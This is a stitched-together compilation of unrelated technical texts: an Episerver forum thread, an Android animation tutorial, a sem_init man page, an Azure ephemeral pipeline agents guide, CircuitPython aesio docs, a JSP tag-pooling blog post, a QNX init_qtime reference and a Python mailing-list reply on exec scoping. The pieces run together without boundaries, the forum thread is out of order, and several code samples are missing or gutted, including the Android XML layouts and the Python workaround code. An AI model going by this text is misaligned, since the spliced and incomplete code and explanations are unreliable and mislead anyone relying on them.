I also tried to change the code on an already published node and the problem is the same, so it has nothing to do with whether the node is published or not. So I guess the problem is that the CatalogNode code is not updated before you publish your change. Maybe it is a bit more complicated than that. I mean, before you publish your change on a published node the code should still be the old value, but if the node has never been published the code should update right away in the table. Do you agree, or maybe I'm missing something?

Thanks for your time Quan!

/Kristoffer

Hi guys,

Sorry to jump in, but I just want to confirm that I can reproduce the problem as Kristoffer described in the comment above.

@Kristoffer: The point "if the node never has been published the code should update right away in the table" makes sense to me, but maybe we need some more discussion to decide whether we should go ahead with this or not. We will let you know.

Thanks for your detailed info.

/Ba

Hi Magnus!

So what happens is this. Our customer has an ERP from which they import all their products. Every product has a category code which should match the code on the node in Episerver. Before they publish the node and the products underneath it, they want to see what it looks like on the web, so they create a new node and change the code without publishing it, and then start the import job. Since the code of the Episerver node is not changed before it is published, the products cannot find their nodes when being imported, so nothing is imported.

The problem is that when the node is published, it is pushed into the search engine, so you can search for the node, and it is also shown in a megamenu. Of course there are many ways to solve this by adding a property to the node ("Don't show in megamenu", "Don't index" and so on), and that we could easily do. Or you could publish the node and then change the "Start publish" date, so this is not a big problem. I just want you to analyse the problem and decide if this is a bug or something you have to live with.

Thanks Magnus, let me know if you have any more questions.

/Kristoffer

Thanks for the quick response and detailed explanation. While your use case is very reasonable, changing the behavior to support it isn't as simple as it might first appear.

At first it seems reasonable to update the code (or perhaps all properties) in the main tables whenever a draft (not-yet-published) content is saved. But that creates a number of hard-to-solve problems, for example what to do if there are multiple drafts for the content. Another approach is to expand the code-to-contentlink resolving to include drafts. But that leads to similar issues - should it match any draft, the latest draft, the common draft? What if multiple content items have drafts matching the code?
Do we need to enforce uniqueness of codes across published as well as unpublished content?

So we're still debating if we can/should fix this.

The import code, is that a custom implementation? If so, can't it create the node with the correct code when importing the entries? It can create the node as not published/active.

Another possible workaround is to override the Code property in your node content type, and make it required:

public class MyNode : NodeContent
{
    [Required]
    public override string Code { get; set; }
}

This will make it appear in the create screen in the UI and give you a chance to set the code. This initial change will be propagated to the main tables and work as you expect in the import.

Thanks Magnus! A lot of good tips there, and yes, it is a custom implementation. I think I will go for the override-required fix. That will absolutely solve the problem without affecting anything, and it only requires a few lines of code.

I see there are a lot of problems to solve here for you, and I can easily fix mine, so maybe you should just let it be? :)

Looking forward to hearing your decision.

/Kristoffer
Meanwhile, as a workaround, you can add another attribute to kill the "PreviewableText" editor type and revert it to the default textbox: Just add [UIHint("")]. This is probably better UX in your case as well. Hi! I am using this line of code to get a reference to a catalog node: Works just fine it the node is published but not on a newly created node. Is there any way to get the reference to a unpublished catalog node? /Kristoffer
https://world.episerver.com/forum/developer-forum/Episerver-Commerce/Thread-Container/2016/11/get-unpublished-catalog-node-by-code/
In this article by Alex Shaw, author of Android 3.0 Animations Beginner's Guide, we will build on the tweening techniques we've already learned, and also apply some new techniques that were introduced in Android 3.0. In this article, we shall:

- Use a ViewFlipper for animating a book-like application
- Use Java to define a new tween animation and apply it to a view
- Use an ObjectAnimator to apply an animation to a view, a bit like a tween
- Use a ValueAnimator to generate values, which we will use for a more complex animation
- Compare the Animator classes to the tween classes

Note for developers using versions of Android before 3.0

So far, everything we have learned has been backwards-compatible with previous versions of Android. This will hold true for the first part of this article, but not the second. That is to say that ViewFlippers are backwards-compatible with previous versions of Android, but ValueAnimators and ObjectAnimators are new in version 3.0. At the time of writing (mid-2011), the Android Compatibility Package does not help with this problem.

Turning pages with a ViewFlipper

ViewFlipper is a neat little wrapper class for applying a page-turning animation to a set of pages. It makes use of the tween animation classes, and extends them with an XML interface. The ViewFlipper is actually a subclass of something called a ViewAnimator. Do not get confused! A ViewAnimator is a completely different class to a ValueAnimator or an ObjectAnimator, and they are not interchangeable. Let's see more.

Time for action – making an interactive book

You have been hired by a children's book publisher to make an interactive book. The book will teach kindergarten children about different sorts of motion by showing them small animations on the pages. First up, we will use a ViewFlipper widget to make an animated page-turning interface. We will also add some simple pages to test the ViewFlipper, which we can add animations to in some later examples. What better way to learn about a page-turning widget than by using it to make a book?
We will also add some simple pages to test the ViewFlipper, which we can add animations to in some later examples. - Create a new Android project with the following settings: - Project name: Interactive Book - Build target: Android 3.0 - Application name: Interactive Book - Package name: com.packt.animation.interactivebook - Activity: InteractiveBook - The first thing we will do is to define a layout for our book. We want it to look a little bit like the following screenshot: - So let's begin! Open res/layout/main.xml and create the following layout: <!--?xml version="1.0" encoding="utf-8"?--> - Here we have set up the layout of the application, but we have not yet added any pages. In XML, the pages of the ViewFlipper are created by adding child layouts to ViewFlipper. - Firstly, we will want a Drawable, which we can animate. Create a new file in res/drawable called res/drawable/ball.xml and give it the following contents: <!--?xml version="1.0" encoding="utf-8"?--> - This is just an ordinary ShapeDrawable; there's no special animation and stuff here! We will just use it as a simple ball graphic while we are writing the book. Later on, we will add animation. - In main.xml, between the and tags, add the following new elements: I will intersperse the code with pictures, so that you can see what we are adding as we go along. You should add the XML in order, and use the pictures as a quick guide to get what you want? First, take a look at the following screenshot. This should give you an idea of the structure of the page that we are going to make: - Looks simple enough? Let's write the layout code for it. Remember that this is going between the and tags. - That was page 1, now let us make page 2. It will be laid out like the next screenshot: - The layout text that follows should go between the for page 1 and the tag. - Finally, this is what the last page will look like: - As you might suppose, the layout that follows goes between page 2 and the tag. 
- Our content pages are defined in XML. Our ViewFlipper is going to treat each of the highest-level elements (the LinearLayout and the TextView) as pages in its layout. In this sense, it works exactly as a FrameLayout would work. - Okay, great. If you ran this now, you would be able to see the first page, but we've still not connected the page-turning buttons. Let's do that now. Open up InteractiveBook.java and add the following import declarations: import android.view.View; import android.widget.Button; import android.widget.ViewAnimator; - The last one is the most important. As I mentioned earlier, the ViewFlipper is a subclass of ViewAnimator. Seeing, as we don't need to use any of the methods of the subclass, we are only going to work with its superclass. - Now, add the following block of code at the end of onCreate(). final ViewAnimator pages = (ViewAnimator) findViewById(R.id.pages); Button prev = (Button) findViewById (R.id.prev); Button next = (Button) findViewById (R.id.next); prev.setOnClickListener(new View.OnClickListener() { public void onClick (View v) { pages.showPrevious(); } }); next.setOnClickListener(new View.OnClickListener() { public void onClick(View v) { pages.showNext(); } }); - Here we can see exactly how to write a page-turning control in a ViewFlipper. Simply call pages.showPrevious() or pages.showNext(). - Build and run your application. You should see that the ViewFlipper turns pages perfectly well now. - There's something missing from this interactive book—the animation between the pages is not very smooth. In fact, all it does is switch between one page and the next. Let's give it a more natural feel with a page turning animation. In res/anim, create a new XML file called slidein.xml. This will be an ordinary tween animation. We will use this animation to introduce new pages to the screen. 
Add the following block of code to it: <!--?xml version="1.0" encoding="utf-8"?--> - This means that when the user turns a page, the new page comes across from the right-hand side of the screen, as if they were turning pages in a book (sort of). - Now let's add the opposite effect, by removing the old page from the screen. In res/anim, create another XML file called – you guessed it – slideout.xml. In it, add the following XML: <!--?xml version="1.0" encoding="utf-8"?--> - As the pages arrive from the right, they also move off to the left. - Now we need to add this animation to the ViewFlipper. Open up main.xml again, and add these attributes to our declaration of the ViewFlipper. - Now build and run the interactive book. You will see that your pages now transition smoothly from one to the next. What just happened? We created a book-like application that displays several pages of information. We created a new ViewFlipper widget and applied a page-turning animation to it to give it a natural, book-like feel. For convenience, the animations applied to ViewFlipper will apply to every single page that is contained within it. Remember, you do not need to apply an individual tween to each page in your book. Just adding the inAnimation and outAnimation in your ViewFlipper will be sufficient. (For more resources on Android, see here.) Have a go hero – improving the ViewFlipper Think about how you would like to turn pages in a book. Perhaps the motion that we created above could be improved in some way. Edit the slidein.xml and slideout.xml tween animations, and create a new animation of your own invention. Creating tween animations in Java So far, all of the tween animations we made have been created in XML, and there is good reason for this. Why should you want to clutter up your logical code with a load of presentation code? 
But sometimes you want to create your tweens programmatically, perhaps because they rely on some computed values or it makes sense to describe them computationally. Whatever the reason, we can use Java to create tween animations just as easily as we can create them in XML. Time for action – creating a tween in Java We want to make a new animation to replace slidein.xml. This time, we want our pages to come in from the right, as before, but we will add a scale animation too, to make it look more exciting. It will be as if the page is being pulled from a tall stack of pages, just out of view. But we're bored of XML. Don't ask me why, perhaps it's because of all those pointy brackets. Give us the round parentheses of Java, we say! We will use the Java equivalent of the XML tags for , , and animations. - Open up InteractiveBook.java and add the following import lines: import android.view.animation.Animation; import android.view.animation.AnimationSet; import android.view.animation.ScaleAnimation; import android.view.animation.TranslateAnimation; - All these classes describe animations like the ones we made use of in XML. - becomes AnimationSet - becomes ScaleAnimation - becomes TranslateAnimation - 2. Next, let's construct an AnimationSet, into which we can build a compound animation. Navigate to the bottom of the onCreate() method and add the following code: AnimationSet slideAndScale = new AnimationSet(true); - This creates an AnimationSet. The Boolean true means that we want a shared interpolator. It's the Java equivalent of writing the following in XML (don't add this to your code!): - Now to create a translate animation, go into the . Add the following code below our AnimationSet. 
TranslateAnimation slide = new TranslateAnimation( Animation.RELATIVE_TO_PARENT, 1f, Animation.RELATIVE_TO_PARENT, 0, Animation.RELATIVE_TO_SELF, 0, Animation.RELATIVE_TO_SELF, 0 ); - The Java constructor for a TranslateAnimation lets you specify the fromX, toX, fromY, and toY components of the translation. The enumeration values are the equivalent of the different value types that you can input in XML. - The options that you can specify are RELATIVE_TO_PARENT, RELATIVE_TO_SELF, and ABSOLUTE. - Now to make a scaling animation. ScaleAnimation scale = new ScaleAnimation( 10, 1, 10, 1 ); - Similar to the TranslateAnimation constructor, the arguments are fromX, toX, fromY, and toY, except that this time they are all floating-point multiplier values. - 5. Now we add them in to the main - AnimationSet as follows: slideAndScale.addAnimation(slide); slideAndScale.addAnimation(scale); - Next, we want to specify the duration of the animation. As everything has been already added to the AnimationSet, all we need to do is add the following line: slideAndScale.setDuration(1000); - As you probably expect, by now, 1000 is the duration in milliseconds to show the animation. - This concludes the construction of the AnimationSet. So all we need to do now is to set it as the inAnimation on our ViewFlipper. We've already got access to the ViewFlipper object as pages, so we can simply add this: pages.setInAnimation(slideAndScale); - There! Build and run your activity and observe the new animation. - As you can see, the image now scales as the page is turned. What just happened? We've created a new page-turning animation, which is an AnimationSet, containing a ScaleAnimation and a TranslateAnimation. Now the page looks like it is being lifted into view, as it is turned. We've created tween animations before, but this one was in Java. 
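The way an AnimationSet combines its children can be modeled outside Android: each child animation maps a normalized time t in [0, 1] to a transform value, and the set applies them together. A minimal Python sketch of the slide-and-scale combination (plain functions for illustration, not the Android API; the default values mirror the fromX/toX arguments above):

```python
def translate(t, from_x=1.0, to_x=0.0):
    # Linear interpolation of the X offset, as a fraction of parent width.
    return from_x + (to_x - from_x) * t

def scale(t, from_factor=10.0, to_factor=1.0):
    # Linear interpolation of the scale multiplier.
    return from_factor + (to_factor - from_factor) * t

def slide_and_scale(t):
    """Evaluate the compound animation at normalized time t (0.0..1.0)."""
    return {"x_offset": translate(t), "scale": scale(t)}

start = slide_and_scale(0.0)  # page fully off-screen right, at 10x size
end = slide_and_scale(1.0)    # page in place at natural size
```

Evaluating at t = 0 and t = 1 reproduces the start and end states of the tween; the shared interpolator in the real AnimationSet simply remaps t before both functions see it.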
We have seen that it is possible to create a tween animation in Java that provides the same sort of functionality you would expect from a tween animation created in XML. By comparing the source against its equivalent in XML, you can see where the differences lie. Writing the SlideAndScale animation in Java: In Java, we instantiate the AnimationSet, ScaleAnimation, and TranslateAnimation. The animation objects are parameterized in their respective constructors. We then add the ScaleAnimation and TranslateAnimation to the AnimationSet. AnimationSet slideAndScale = new AnimationSet(true); TranslateAnimation slide = new TranslateAnimation( Animation.RELATIVE_TO_PARENT, 1f, Animation.RELATIVE_TO_PARENT, 0, Animation.RELATIVE_TO_SELF, 0, Animation.RELATIVE_TO_SELF, 0 ); ScaleAnimation scale = new ScaleAnimation( 10, 1, 10, 1 ); slideAndScale.addAnimation(slide); slideAndScale.addAnimation(scale); slideAndScale.setDuration(1000); Writing the SlideAndScale animation in XML: In XML, the tween animation is created by declaring a tag that contains the translate and scale operations as child nodes. The animations are parameterized by giving them attributes. <?xml version="1.0" encoding="utf-8"?> As you can see, the advantage of the XML version is that it is more clearly laid out. This is not just a matter of personal taste; by writing each attribute name as you assign it, there is never any ambiguity as to which value you are assigning. Look at the Java version and see if you can remember what order the constructor arguments appear in. It's hard, isn't it? In conclusion, programmatic tween creation should only be used when you can think of a clear advantage. Have a go hero – tweening using Java: Okay, now that we've made a tween that scales and slides in the graphic, have a go at making a similar tween for the outAnimation part of the interactive book.
Look at the code you've already written, and make a new animation in Java with the following properties: - As the page leaves the screen, it moves to the left - As the page leaves the screen, it gets larger. Animating with ObjectAnimator: ObjectAnimators are the first animations you will learn about that are new in Android 3.0. Recall that tweens are all about moving views from one place to another, and that they describe different kinds of motion. Unlike tweens, animators work by updating values on an object in a much more programmatic way. Animators just change numeric parameters on an object that they know nothing about. But by applying an animator to the X and Y coordinates of a view, an Animator can be used to perform the same task that a tween would, for instance translating a view from one place to another. Which one you choose is up to you. Animators give you more flexibility, but they might not be as clear to read. Time for action – animating the rolling ball: The children's book company has got back to us and they're not happy with the first page of our interactive book. It says that the ball is rolling, but it isn't! We're going to fix this by using an ObjectAnimator to move the ball backwards and forwards across the screen. - Open up InteractiveBook.java and add the following import declarations (ValueAnimator is needed for the repeat constants used below): import android.animation.ObjectAnimator; import android.animation.ValueAnimator; This should come as no surprise! I already told you that we would be using the ObjectAnimator class. - Next, go to the end of the onCreate() method, and add the following lines: View rollingBall = findViewById(R.id.rollingball); ObjectAnimator ballRoller = ObjectAnimator.ofFloat( rollingBall, "TranslationX", 0, 400 ); - Underneath the code you just added, add the following. ballRoller.setDuration(2000); ballRoller.setRepeatMode(ValueAnimator.REVERSE); ballRoller.setRepeatCount(ValueAnimator.INFINITE); - These settings should look familiar from the XML we wrote in the previous chapter, although the Java form may seem unfamiliar.
- setDuration sets the duration of the animation in milliseconds - setRepeatMode can be either RESTART or REVERSE - setRepeatCount can be an integer number of repeats or (as it is here) INFINITE - One last line you need to add after all of this is to tell Android to begin the animation immediately. ballRoller.start(); - And that's it! Couldn't be simpler. Build and run your activity and you will see that the ball on the first page now rolls backwards and forwards. - This red ball is rolling, because we animated it! What just happened? Here we used our first Animator, and it is an ObjectAnimator. The ObjectAnimator provides a simple way to animate a scene by continuously updating a parameter of that scene. Summary: In this article, we made an interactive animation using the Android ViewFlipper class to build a page-turning interface, and we learned about the ValueAnimator and ObjectAnimator classes, which are new animation techniques in Android 3.0.
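Conceptually, an ObjectAnimator with a REVERSE repeat mode just generates a value that ping-pongs between its endpoints over time. A small Python model of the 0 to 400 TranslationX animation above (illustrative only, not the Android API):

```python
def animated_value(elapsed_ms, start=0.0, end=400.0, duration_ms=2000):
    """Value of a REVERSE-repeating animation at a given elapsed time."""
    cycle = elapsed_ms // duration_ms            # full passes completed
    t = (elapsed_ms % duration_ms) / duration_ms # progress within this pass
    if cycle % 2 == 1:                           # odd passes run backwards
        t = 1.0 - t
    return start + (end - start) * t

# The ball rolls out for 2 seconds, then rolls back for 2 seconds, forever.
positions = [animated_value(ms) for ms in (0, 1000, 2000, 3000, 4000)]
```

Sampling at 0, 1000, 2000, 3000, and 4000 ms traces the ball out to 400 and back to 0, which is exactly the backwards-and-forwards rolling the tutorial describes.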
sem_init - initialise an unnamed semaphore (REALTIME) #include <semaphore.h> int sem_init(sem_t *sem, int pshared, unsigned int value); The sem_init() function is used to initialise the unnamed semaphore referred to by sem. The value of the initialised semaphore is value. Following a successful call to sem_init(), the semaphore may be used in subsequent sem_wait(), sem_trywait(), sem_post(), and sem_destroy() operations. Only sem itself may be used for performing synchronisation. The result of referring to copies of sem in calls to sem_wait(), sem_trywait(), sem_post(), and sem_destroy() is undefined. If the pshared argument is zero, then the semaphore is shared between threads of the process; any thread in this process can use sem for performing sem_wait(), sem_trywait(), sem_post(), and sem_destroy() operations. The use of the semaphore by threads other than those created in the same process is undefined. Attempting to initialise an already initialised semaphore results in undefined behaviour. Upon successful completion, the function initialises the semaphore in sem. Otherwise, it returns -1 and sets errno to indicate the error. The sem_init() function will fail if: - [EINVAL] - The value argument exceeds SEM_VALUE_MAX. - [ENOSPC] - A resource required to initialise the semaphore has been exhausted, or the limit on semaphores (SEM_NSEMS_MAX) has been reached. - [ENOSYS] - The function sem_init() is not supported by this implementation. - [EPERM] - The process lacks the appropriate privileges to initialise the semaphore. sem_destroy(), sem_post(), sem_trywait(), sem_wait(), <semaphore.h>. Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995)
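The same counting-semaphore semantics can be exercised from Python's standard library, which mirrors the POSIX primitives: the threading.Semaphore constructor plays the role of sem_init's value argument, acquire() of sem_wait()/sem_trywait(), and release() of sem_post(). A short sketch:

```python
import threading

# Initialize a semaphore with value 2, analogous to sem_init(&sem, 0, 2).
sem = threading.Semaphore(2)

acquired = []
sem.acquire()                         # like sem_wait(): value 2 -> 1
acquired.append("first")
sem.acquire()                         # like sem_wait(): value 1 -> 0
acquired.append("second")

# A non-blocking attempt on an exhausted semaphore fails,
# like sem_trywait() failing with EAGAIN.
got_third = sem.acquire(blocking=False)

sem.release()                         # like sem_post(): value back to 1
got_after_post = sem.acquire(blocking=False)
```

As in the POSIX description, all threads of the process may use the one semaphore object; copying it is never meaningful.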
If you have Azure resources that aren't exposed on the internet but are only accessible via a private network, you can't use Microsoft-hosted agents, because they can't connect to the private network. Therefore, we need to maintain a pool (or several pools) of self-hosted agents, with the associated costs and effort to maintain that pool (or pools). This is where ephemeral pipeline agents come into action. Overview: Ephemeral pipeline agents eliminate the need to use and maintain pools of self-hosted agents for deployment purposes. These agents are able to deploy to private Azure resources. The process is not very complex. Ephemeral pipeline agents run in an Azure Container Instance (ACI) with access to the private network where the other Azure resources are. The agents are created to run a pipeline job and then deleted to avoid extra costs and resource consumption. This way, we can deploy to private Azure resources without having to expose them on the internet or having to maintain self-hosted agents on the same virtual network (or with access to it), with their associated costs and cons. The agent that runs in the ACI is only a basic Docker image with the necessary dependencies to run the agent and to be able to deploy to our private resources: for example, a base Ubuntu image with the necessary dependencies and the deploy agent installed. TL;DR: The purpose of this task is to create a short-lived Azure Pipelines agent to run a deploy in a private virtual network, so we can deploy to Azure resources that are not internet accessible. How does the process work? Only three steps/requirements: - One Docker image that can run a deploy agent in a container (needed to provision agents). - Provision one ephemeral pipeline agent to run the deployment job.
This process can be done using this task. This task provisions, configures and registers an agent on an ACI using the docker image mentioned in the first step. - The container runs one pipeline job, and then it unregisters the agent and deletes the container (it self destructs). So considering we have setup a docker image that can run a deploy agent in a container, our pipeline will look like this: As you can see, two jobs are needed: - The first one provisions the agent in one pool to run the deployment job. - The second one (depending on the first being finished correctly), runs the deployment job. It runs on the agent that the first job has provisioned. Tutorial In this post I will guide you through a simple tutorial on how to deploy assets on a container in an Azure Storage account in a private virtual network, using Ephemeral pipeline agents. So let’s get started! Requirements: - A virtual network with a security group. - A dedicated subnet in the virtual network to run the ephemeral agents. - The agent must run in the same Azure location as the virtual network. - All the created subnets must share the same security group. Overview of the resources For this tutorial I have created two resource groups: - One for the virtual network and the security group. - Another one for the Azure Container Registry (ACR) and the storage we will deploy to. Also, the Azure Storage account should be in the private network, with a configuration similar to this one: If you need it, the main repo of ephemeral agents has sample scripts on how to deploy these resources. Pushing the base image for ephemeral agents Once finished configuring our resources in Azure, we will need the base image to use with the ephemeral agents.In this case I have used the Agent Images available in the GitHub repo, specifically the Ubuntu one. We can use the pipeline in the GitHub repo to deploy our Agent image in the ACR (using an ACR Service connection). 
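The provision, run, self-destruct lifecycle described above is essentially a scoped resource. A hedged Python sketch of the pattern (the names here are illustrative stand-ins; the real task talks to Azure and the Azure DevOps agent pool APIs):

```python
from contextlib import contextmanager

events = []  # records the lifecycle for illustration

def provision_agent(pool):
    # Stand-in for: create the ACI and register the agent in the pool.
    events.append(f"register agent in {pool}")
    return "agent-1"

def delete_agent(agent):
    # Stand-in for: unregister the agent and delete the container.
    events.append(f"unregister and delete {agent}")

@contextmanager
def ephemeral_agent(pool):
    agent = provision_agent(pool)   # first job: provision the agent
    try:
        yield agent                 # second job: deployment runs on it
    finally:
        delete_agent(agent)         # the agent self-destructs afterwards

with ephemeral_agent("private-pool") as agent:
    events.append(f"run deploy job on {agent}")
```

The try/finally mirrors the requirement that deprovisioning happens even if the deploy job fails, which is why the pool ends up with no registered agents after the pipeline run.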
After that, we should have one repository with one image in our ACR: Setting up the pipeline in Azure DevOps: After creating the needed resources and pushing the agent image to the ACR, we are ready to create our pipeline and use ephemeral agents to deploy. First of all, we will need to create an additional agent pool in our project, and grant access to all pipelines. Permissions: For this process we will need to grant specific permissions in order to allow the pipeline to register agents in the new pool, run jobs on these agents, and unregister them. In order to register the agent, a token with sufficient permissions on the Azure DevOps organization the agent is going to be registered in is needed. You can use two different types of tokens: a Personal Access Token or an OAuth token (recommended). - If using a Personal Access Token (PAT), it requires the Agent Pools Read & Manage scope, and the user who owns the PAT must have administration privileges on the agent pool you intend to register the agent in. - If using an OAuth token, the best approach is to use System.AccessToken, which is short-lived, dynamic, and automatically managed by the system. If using the OAuth token, you need to meet the following conditions: - The timeout for the job that creates the agent only expires after the deploy job in the agent is finished (because the token is used to register and unregister the agent in the pool). - The account Project Collection Build Service (YOUR_ORG) needs to have administration permissions on the pool (granted at the organization level, not at the team project level). In this example, permissions on the pool (for the OAuth token approach) will look like the following: Additional considerations: You must register an Azure resource provider for the namespace Microsoft.ContainerInstance in order to create container instances for the agents.
This can be done easily by opening a PowerShell instance in the Azure portal and executing the following command: Register-AzureRmResourceProvider -ProviderNamespace 'Microsoft.ContainerInstance' This will register the needed Azure resource provider. Service connections: Also, as mentioned above, we will need an ACR service connection to our ACR to run the ephemeral agents in the ACI from the agent image in the ACR (granting permissions to all pipelines). Pipeline definition: In this part of the process, two pipelines are created for my sample project: one for creating the base image for the agents in the ACR (which we have previously created), and another one for the main deploy process of our project. The main deploy pipeline used in this tutorial is the same as the one defined in the GitHub repo sample. As we have seen in the previous stages, we have to define two jobs: one to provision the agent and another one to perform the deploy job. Configure the variables in the sample pipeline to reference your resources correctly and then try to run it: If we have configured everything correctly, the pipeline will succeed: If we inspect our created agent pool, we will see the executed job but no agents registered in the pool (which is the main purpose of this process). This is because the agent unregistered itself when the deployment job finished. Final result: After the deploy pipeline execution, we can check that we have successfully deployed our assets to the Azure Storage container connected to the private virtual network: Conclusion: We have seen how ephemeral pipeline agents work, how to replace self-hosted agents with ephemeral ones, and the most important part: how to reduce the maintenance costs of having our own self-hosted agent pool(s). It is important to emphasize that this process is currently in preview, so maybe some things just do not work out of the box, but I personally think it's an excellent approach to avoid having self-hosted agents in the mentioned situations.
Happy deploying! 🎉🎉
aesio – AES encryption routines The AES module contains classes used to implement encryption and decryption. It aims to be low overhead in terms of memory. - class aesio.AES(key: ReadableBuffer, mode: int = 0, iv: Optional[ReadableBuffer] = None, segment_size: int = 8) Encrypt and decrypt AES streams. Create a new AES state with the given key. Additional arguments are supported for legacy reasons. Encrypting a string: import aesio from binascii import hexlify key = b'Sixteen byte key' inp = b'Circuit Python!!' # Note: 16-bytes long outp = bytearray(len(inp)) cipher = aesio.AES(key, aesio.mode.MODE_ECB) cipher.encrypt_into(inp, outp) hexlify(outp) encrypt_into(self, src: ReadableBuffer, dest: WriteableBuffer) Encrypt the buffer from src into dest. For ECB mode, the buffers must be 16 bytes long. For CBC mode, the buffers must be a multiple of 16 bytes, and must be of equal length. For CTR mode, there are no restrictions.
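The block-length restrictions above are easy to get wrong. Since aesio itself only runs on CircuitPython hardware, here is a small standard-Python helper that models just the buffer-sizing rule (a simple zero-padding sketch, not a real padding scheme such as PKCS#7):

```python
BLOCK = 16  # AES block size in bytes, as required by ECB and CBC buffers

def pad_to_block(data: bytes) -> bytes:
    """Zero-pad data to a multiple of 16 bytes, as CBC/ECB buffers require."""
    remainder = len(data) % BLOCK
    if remainder == 0:
        return data
    return data + b"\x00" * (BLOCK - remainder)

padded = pad_to_block(b"Circuit Python!")   # 15 bytes -> padded to 16
exact = pad_to_block(b"Circuit Python!!")   # already 16 bytes, unchanged
```

With a buffer padded this way, dest can be allocated as bytearray(len(padded)) and passed to encrypt_into without tripping the length restriction.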
JSP Tag Pooling Memory Leaks 08/14/09 by Fabian Lange 1 Comment

JSP custom tags were once widely used, and even nowadays they still find their way into projects, not to mention the masses of production code using them. Almost all projects I have looked at that use custom tags had the same issue. When writing JSP custom tags you have to remember the lifecycle model of a custom tag, because the container will typically pool tag instances. This is allowed and recommended by the specification, but can create lots of trouble when the tag is incorrectly written. Storing big objects in the tag instance will create a memory leak that can make your server go boom (or nothing happens, because your tag pool is small and the instance is in use almost all the time). Typically this sneaks by unnoticed in the development environment. The code causing this problem typically looks like this:

public class MyTag extends TagSupport {
    public Object leak;
    public int doStartTag() {
        leak = new BigObject();
        return SKIP_BODY;
    }
}

This is a problem, because the lifecycle of a pooled tag looks like this:

1. load class
2. create instance
3. invoke setPageContext()
4. invoke setters
5. call doStartTag()
6. call possibly other tag methods, depending on the tag type and return values
7. call doEndTag()
8. put instance in pool

When the same tag is re-requested, it may start at step 3. If in the above example this tag is pooled with, say, 10 instances and 10 simultaneous requests, 10 instances are created in the pool. But after that only a few requests come in. Still, 10 instances of the tag are in the pool and contain a reference to the BigObject. This is a memory leak. To avoid this, always null out "transient" instance variables of the class and reload them either in setPageContext() or doStartTag(). Also note that the code inside the constructor might only be run once per tag, even when the tag is used on hundreds of pages. The number of tag instances created (and thus also the number of constructors invoked) depends on the container, the pool settings, and the server load.

public class MyTag extends TagSupport {
    public Object noLeak;
    public void setPageContext(PageContext pc) {
        super.setPageContext(pc);
        noLeak = new BigObject();
    }
    public int doStartTag() {
        return SKIP_BODY;
    }
    public int doEndTag() {
        noLeak = null;
        return EVAL_PAGE;
    }
}

Other alternatives are to improve the code design and make variables as local as possible. A related problem is that you might find values in your tag that you don't expect. Let's say a property is set when a certain parameter has a specific value. Now that condition was true, so the property holds an object that is not nulled out. The next usage of that tag will find the object even though the condition on the parameter is not met. This can really mess up your logic.
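The pooling pitfall is not JSP-specific; any object pool exhibits it when pooled instances keep per-request state. A minimal Python sketch (no servlet API involved; names are illustrative) contrasting a pooled object that leaks its state with one that resets on release:

```python
class PooledTag:
    """Toy model of a pooled tag instance."""

    def __init__(self, reset_on_release):
        self.reset_on_release = reset_on_release
        self.big_object = None

    def do_start(self, payload):
        self.big_object = payload        # per-request state, like the tag's field

    def do_end(self):
        if self.reset_on_release:
            self.big_object = None       # the fix: null out in doEndTag()

leaky = PooledTag(reset_on_release=False)
fixed = PooledTag(reset_on_release=True)

for tag in (leaky, fixed):
    tag.do_start(bytearray(1024))        # simulate serving one request
    tag.do_end()                         # tag goes back into the pool
```

After one request the leaky instance still pins its payload while idle in the pool, which is exactly the retained BigObject reference described above.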
Initialize the qtime data structure in the system page. #include "board_startup.h" void init_qtime (void) None. This function initializes the system page's qtime data structure. Initializations this function performs can include: For many x86 platforms, the generic function works. For ARM platforms, board-specific functions are often required. The following example is a init_qtime() function for the fictitious ARM DK Elsinore Ghost 8 board: #include "elsinore_startup.h" extern unsigned armv7gt_cntfrq; extern unsigned armv7gt_irq; void init_qtime_ghost8() { struct qtime_entry qtime; if (fdt_qtime(&qtime) == 0) { armv7gt_cntfrq = qtime.cycles_per_sec; armv7gt_irq = qtime.intr; } init_qtime_v7gt(); } The following example is a generic init_qtime() function x86 boards: #include "startup.h" /* By default we continue to use the 8254 timer as the system clock. However, * if the 'use_hpet_timer' flag is set we use the higher resolution HPET0 as * the system clock. * Startups have 2 choices for accomplishing that. They can set the * 'use_hpet_timer' flag in their main() and continue to call init_qtime(), or * they can call init_qtime_hpet() directly. Continuing to call init_qtime() * provides for a fallback to the 8254. startup-x86 uses the 'use_hpet_timer' * flag so that the startup specific -z option will revert to using the 8254. */ unsigned use_hpet_timer = 0; void init_qtime() { struct qtime_entry *qtime = alloc_qtime(); // ensure this is done once if (!use_hpet_timer || (init_qtime_hpet(qtime) != 0)) { init_qtime_8254(qtime); } }
On Wed, 05 Sep 2007 13:12:24 +0000, carl.dhalluin at gmail.com wrote:

> I am completely puzzled why the following exec code does not work:
>
> def execute():
>     exec mycode
> execute()
>
> I get the error:
>
> root at devmachine1:/opt/qbase# python error1.py
> Traceback (most recent call last):
>   File "error1.py", line 5, in ?
>     execute()
>   File "error1.py", line 4, in execute
>     exec mycode
>   File "<string>", line 4, in ?
>   File "<string>", line 3, in f
> NameError: global name 'math' is not defined
>
> Note that the following code _does_ work:
>
> exec mycode
>
> I have tested this in python 2.3 and 2.4.

exec breaks nested namespaces here. Essentially exec "import math" puts the "math" name into the local namespace, but "def f(): math.floor" looks up "math" in the global namespace. On the module level the global and local namespaces are identical

>>> globals() is locals()
True

but inside a function they are distinct

>>> def f(): return globals() is locals()
...
>>> f()
False

A workaround is to declare "math" as global:

>>> def execute():
...     exec s
...
>>> execute()
3.0

or pass it explicitly:

[new interpreter session]

>>> def execute():
...     exec s
...
>>> execute()
3.0

Peter
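In modern Python the portable fix is to hand exec an explicit namespace dictionary, so the import and the function definition land in the same scope. This sketch uses Python 3 syntax (the original thread is Python 2.3/2.4, where math.floor returned 3.0; in Python 3 it returns the int 3), and the code string here is an illustrative stand-in for the poster's mycode:

```python
code = """
import math

def f():
    return math.floor(3.5)

result = f()
"""

# One dict serves as both globals and locals for the exec'd code,
# so the name `math` bound by the import is visible inside f().
namespace = {}
exec(code, namespace)
```

Because exec'd top-level code and the exec'd function now share the same globals dict, the NameError from the thread cannot occur.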
